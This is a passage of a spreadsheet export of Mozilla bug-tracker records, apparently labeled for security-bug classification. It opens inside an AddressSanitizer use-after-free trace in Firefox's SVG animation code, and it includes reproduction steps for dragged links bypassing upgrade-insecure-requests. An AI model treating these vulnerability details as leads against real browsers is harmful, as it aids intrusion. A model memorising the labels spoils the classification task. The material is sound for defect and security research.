    #57 0x7f8edc0216ab in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8863:7
    #58 0x7f8edc02124b in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8789:9
    #59 0x7f8edbff727c in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5294:3
    #60 0x7f8edc0c7192 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #61 0x7f8edc0c7192 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #62 0x7f8edc0c7192 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #63 0x7f8ed94e7ab2 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:257:21
    #64 0x7f8ed951c632 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #65 0x7f8ed9518ee0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #66 0x7f8eda32ebff in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #67 0x7f8eda2a02a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #68 0x7f8eda2a02a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #69 0x7f8eda2a02a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #70 0x7f8edf7aabaf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #71 0x7f8ee2fea477 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:871:12
    #72 0x7f8eda2a02a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #73 0x7f8eda2a02a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #74 0x7f8eda2a02a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #75 0x7f8ee2fe9e79 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:695:7
    #76 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #77 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #78 0x7f8ef4a1082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #79 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x616000199dc8 is located 584 bytes inside of 616-byte region [0x616000199b80,0x616000199de8)
freed by thread T0 (Web Content) here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f8ed93ba7c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f8ed93ba3b6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f8ed93c1775 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7f8ed93c0f30 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7f8ed93c3e14 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:3
    #6 0x7f8edc105b30 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7f8edbc5e1fd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f8ed9537d81 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f8edadd2a87 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f8edadd2a87 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f8edadd2a87 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f8edadda3fb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f8ee345d67f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f8ee345d67f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #15 0x7f8ee3444172 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #16 0x7f8ee3444172 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #17 0x7f8ee34297ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f8ee345d996 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #19 0x7f8ee345e072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #20 0x7f8ee3e32fd3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7f8edad11519 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f8ee345d67f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f8ee345d67f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #24 0x7f8ee3444172 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #25 0x7f8ee3444172 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #26 0x7f8ee34297ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7f8ee345d996 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #28 0x7f8ee345e072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #29 0x7f8ee40dd89c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f8ee409452e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #31 0x7f8ee40bd309 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #32 0x7f8ee40bfc34 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7f8ee345d727 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7f8ee345d727 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7f8ee345e072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7f8ee3e34d8c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f8edec04339 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f8edec04339 in NS_NewSVGAnimateElement(nsIContent**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;) /home/worker/workspace/build/src/dom/svg/SVGAnimateElement.cpp:10
    #4 0x7f8edec32156 in NS_NewSVGElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/svg/SVGElementFactory.cpp:130:19
    #5 0x7f8edc12a6ee in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:231:14
    #6 0x7f8edf381810 in nsXMLContentSink::CreateElement(char16_t const**, unsigned int, mozilla::dom::NodeInfo*, unsigned int, nsIContent**, bool*, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:472:8
    #7 0x7f8edf3856f7 in nsXMLContentSink::HandleStartElement(char16_t const*, char16_t const**, unsigned int, unsigned int, bool) /home/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:966:12
    #8 0x7f8edb08f7de in nsExpatDriver::HandleStartElement(char16_t const*, char16_t const**) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:380:19
    #9 0x7f8ee0f96fd1 in doContent /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2468:11
    #10 0x7f8ee0f87fcd in contentProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2098:27
    #11 0x7f8ee0f87fcd in doProlog /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:4078
    #12 0x7f8ee0f7de91 in prologProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3812:10
    #13 0x7f8ee0f7de91 in prologInitProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3629
    #14 0x7f8ee0f7c062 in MOZ_XML_Parse /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:1530:17
    #15 0x7f8edb0952be in nsExpatDriver::ParseBuffer(char16_t const*, unsigned int, bool, unsigned int*) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:1014:16
    #16 0x7f8edb09639a in nsExpatDriver::ConsumeToken(nsScanner&amp;, bool&amp;) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:1112:5
    #17 0x7f8edb0a366b in nsParser::Tokenize(bool) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1532:16
    #18 0x7f8edb09ef28 in nsParser::ResumeParse(bool, bool, bool) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1053:41
    #19 0x7f8edb0a47af in nsParser::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1430:12
    #20 0x7f8ed9688b72 in nsBaseChannel::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /home/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:856:17
    #21 0x7f8ed96d4613 in nsInputStreamPump::OnStateTransfer() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:601:22
    #22 0x7f8ed96d300a in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:429:25
    #23 0x7f8ed94b9afd in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:96:9
    #24 0x7f8ed951c632 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #25 0x7f8ed9518ee0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #26 0x7f8eda32ebff in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #27 0x7f8eda2a02a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #28 0x7f8eda2a02a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f8eda2a02a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f8edf7aabaf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #31 0x7f8ee2fea477 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:871:12
    #32 0x7f8eda2a02a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #33 0x7f8eda2a02a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f8eda2a02a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f8ee2fe9e79 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:695:7
    #36 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #37 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/smil/nsSMILTargetIdentifier.h:75:38 in Equals
Shadow bytes around the buggy address:
  0x0c2c8002b360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c8002b370: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2c8002b380: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2c8002b390: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2c8002b3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c2c8002b3b0: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fa fa fa
  0x0c2c8002b3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c8002b3d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c8002b3e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c8002b3f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c8002b40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8440==ABORTING</t>
        </is>
      </c>
      <c r="X2258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" t="n">
        <v>873906</v>
      </c>
      <c r="B2259" t="inlineStr">
        <is>
          <t>2013-05-19 19:34:50 -0700</t>
        </is>
      </c>
      <c r="C2259" t="inlineStr">
        <is>
          <t>[Buri][GCF][STK]case 27.22.4.13.2/1 SET UP CALL (second alpha identifier) failed</t>
        </is>
      </c>
      <c r="D2259" t="inlineStr">
        <is>
          <t>2015-03-05 15:19:43 -0800</t>
        </is>
      </c>
      <c r="E2259" t="n">
        <v>1</v>
      </c>
      <c r="F2259" t="n">
        <v>1</v>
      </c>
      <c r="G2259" t="n">
        <v>6</v>
      </c>
      <c r="H2259" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2259" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2259" t="inlineStr">
        <is>
          <t>Gaia::Settings</t>
        </is>
      </c>
      <c r="K2259" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2259" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2259" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2259" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2259" t="inlineStr">
        <is>
          <t xml:space="preserve">[u=commsapps-user c=stk p=0] </t>
        </is>
      </c>
      <c r="Q2259" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2259" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2259" t="inlineStr">
        <is>
          <t>1.2 C2(Oct11)</t>
        </is>
      </c>
      <c r="T2259" t="n">
        <v>1</v>
      </c>
      <c r="U2259" t="n">
        <v>0</v>
      </c>
      <c r="V2259" t="n">
        <v>67</v>
      </c>
      <c r="W2259" t="inlineStr">
        <is>
          <t>SW12A
 AU_LINUX_GECKO_ICS_STRAWBERRY_V1.01.00.01.019.105
 Firefox os  v1.0.1
 Mozilla build ID:20130512070209
 +++ This bug was initially created as a clone of Bug #455602 +++
 DEFECT DESCRIPTION:
 [GCF][STK]case 27.22.4.13.2/1 SET UP CALL (second alpha identifier) failed
  REPRODUCING PROCEDURES:
 1 run GCF case 27.22.4.13.2/1 SET UP CALL (second alpha identifier) 
 2 second alpha ID will prompt before call establish---&gt;KO1
 after end the call , ME will not return in idle mode---&gt;KO2
  EXPECTED BEHAVIOUR:
 as spec 51.010-4 case 27.22.4.13.2.4.2 definition.
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:
 ++++++++++ end of initial bug #455602 description ++++++++++
 CONTACT INFO (Name,Phone number):
  DEFECT DESCRIPTION:
  REPRODUCING PROCEDURES:
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X2259" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" t="n">
        <v>1187901</v>
      </c>
      <c r="B2260" t="inlineStr">
        <is>
          <t>2015-07-27 06:45:32 -0700</t>
        </is>
      </c>
      <c r="C2260" t="inlineStr">
        <is>
          <t>Some OpenSearch plugins does not work properly if the input contains UPPERCASE</t>
        </is>
      </c>
      <c r="D2260" t="inlineStr">
        <is>
          <t>2017-04-04 14:38:14 -0700</t>
        </is>
      </c>
      <c r="E2260" t="n">
        <v>1</v>
      </c>
      <c r="F2260" t="n">
        <v>1</v>
      </c>
      <c r="G2260" t="n">
        <v>2</v>
      </c>
      <c r="H2260" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2260" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2260" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2260" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2260" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q2260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2260" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2260" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T2260" t="n">
        <v>1</v>
      </c>
      <c r="U2260" t="n">
        <v>0</v>
      </c>
      <c r="V2260" t="n">
        <v>14</v>
      </c>
      <c r="W2260" t="inlineStr">
        <is>
          <t>STR:
1. Install Yandex search plugin (it's included in Russian l10n of Firefox btw)
2. Enter "Another" into searchbar
RESULT:
No search suggestions. Console says the following:
1) GET XHR https://suggest.yandex.net/suggest-ff.cgi [HTTP/1.1 200 Ok 0мс]
2) SearchSuggestionController: Unexpected response, this._searchString does not match remote response  SearchSuggestionController.jsm:337:0
That XHR's URL is 
https://suggest.yandex.net/suggest-ff.cgi?part=Another , and response is:
["another",["another","another brick in the wall","another world","another one bites the dust","another day in paradise","another point","another перевод","another аниме","anothershop","another day in paradise перевод"]]
Compare it to google search engine that preserves the uppercase character:
https://www.google.com/complete/search?client=firefox&amp;q=Another
["Another",["another brick in the wall","another","another one bites the dust","another world","another day in paradise","another перевод","another brick in the wall перевод","another love","another sleepless night","another day"]]
(!) I don't know if handling those upper/lower-cases is browser's task, but browser made by google handles them.
If it's not, please tell me and I'll report this to Yandex</t>
        </is>
      </c>
      <c r="X2260" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" t="n">
        <v>1561056</v>
      </c>
      <c r="B2261" t="inlineStr">
        <is>
          <t>2019-06-24 12:58:15 -0700</t>
        </is>
      </c>
      <c r="C2261" t="inlineStr">
        <is>
          <t>No upgrade-insecure-requests for dragged links</t>
        </is>
      </c>
      <c r="D2261" t="inlineStr">
        <is>
          <t>2019-10-22 10:02:16 -0700</t>
        </is>
      </c>
      <c r="E2261" t="n">
        <v>1</v>
      </c>
      <c r="F2261" t="n">
        <v>1</v>
      </c>
      <c r="G2261" t="n">
        <v>3</v>
      </c>
      <c r="H2261" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2261" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2261" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2261" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2261" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2261" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main70+]</t>
        </is>
      </c>
      <c r="Q2261" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2261" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T2261" t="n">
        <v>1</v>
      </c>
      <c r="U2261" t="n">
        <v>0</v>
      </c>
      <c r="V2261" t="n">
        <v>11</v>
      </c>
      <c r="W2261" t="inlineStr">
        <is>
          <t>STR:
* Visit http://wopr.norad.org/test1.html
* Drag the link onto a tab or into a new tab
Expected: Link is upgraded to https
Actual: Link remains http
Tested on Firefox nightly 69 Linux, ASAN build</t>
        </is>
      </c>
      <c r="X2261" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" t="n">
        <v>535829</v>
      </c>
      <c r="B2262" t="inlineStr">
        <is>
          <t>2009-12-18 10:54:38 -0800</t>
        </is>
      </c>
      <c r="C2262" t="inlineStr">
        <is>
          <t>Collect/report additional metadata for out-of-process plugins</t>
        </is>
      </c>
      <c r="D2262" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E2262" t="n">
        <v>1</v>
      </c>
      <c r="F2262" t="n">
        <v>1</v>
      </c>
      <c r="G2262" t="n">
        <v>4</v>
      </c>
      <c r="H2262" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2262" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2262" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2262" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2262" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2262" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2262" t="inlineStr"/>
      <c r="Q2262" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2262" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2262" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="T2262" t="n">
        <v>1</v>
      </c>
      <c r="U2262" t="n">
        <v>0</v>
      </c>
      <c r="V2262" t="n">
        <v>26</v>
      </c>
      <c r="W2262" t="inlineStr">
        <is>
          <t>For out-of-process plugins, we are going to be sending additional metadata with crash reports and we'd really like to be able to collect/query on it:
* ProcessType=default|plugin (in the future we will also add "content")
* PluginFilename=libflashplayer.so
* PluginName
* PluginVersion
All of these will potentially be optional. For crash reports without a ProcessType, please assume "default".
In querying, we'd like to be able to filter to see only crashes that occur in the "default" or "plugin" process types. We'd also like to search on substrings of the PluginName, so for example there will be plugin names such as "Shockwave Flash 10.0 r42" and we'd like to be able to get topcrash lists of "all plugin processes with 'Flash' in the plugin name".
Ideally this will be ready by the time we do OOPP betas, which is scheduled for the second week of January. Please let me know if that isn't feasible.</t>
        </is>
      </c>
      <c r="X2262" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" t="n">
        <v>1152177</v>
      </c>
      <c r="B2263" t="inlineStr">
        <is>
          <t>2015-04-07 23:28:17 -0700</t>
        </is>
      </c>
      <c r="C2263" t="inlineStr">
        <is>
          <t>"Assertion failure: js::CurrentThreadCanAccessRuntime(runtime_)" with watch() in Worker</t>
        </is>
      </c>
      <c r="D2263" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:15 -0700</t>
        </is>
      </c>
      <c r="E2263" t="n">
        <v>1</v>
      </c>
      <c r="F2263" t="n">
        <v>1</v>
      </c>
      <c r="G2263" t="n">
        <v>3</v>
      </c>
      <c r="H2263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2263" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2263" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2263" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2263" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2263" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2263" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q2263" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2263" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2263" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T2263" t="n">
        <v>1</v>
      </c>
      <c r="U2263" t="n">
        <v>0</v>
      </c>
